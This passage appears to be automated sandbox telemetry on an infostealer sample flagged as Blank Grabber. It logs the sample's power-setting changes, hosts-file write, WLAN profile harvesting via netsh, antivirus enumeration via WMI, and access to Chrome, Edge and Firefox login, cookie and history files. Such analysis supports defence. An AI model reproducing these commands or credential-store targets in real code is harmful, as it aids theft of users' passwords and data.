Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\Built.exe

Code function: 4_2_00007FF62664D080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

4_2_00007FF62664D080

Source: C:\Users\user\AppData\Local\Temp\Built.exe

Code function: 4_2_00007FF626665EEC _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

4_2_00007FF626665EEC

Source: C:\Users\user\AppData\Local\Temp\Built.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\instals.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\Built.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

Stealing of Sensitive Information

Yara detected Blank Grabber

Source: Yara match	File source: 00000005.00000003.1724535496.000002B9B96E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1710226799.0000021148F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1710226799.0000021148F02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2085800430.000002B9B9480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2084370942.000002B9B713F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2086197806.000002B9B98BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2086727493.000002B9B99E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2081920578.000002B9BA2AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI54322\rarreg.key, type: DROPPED

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
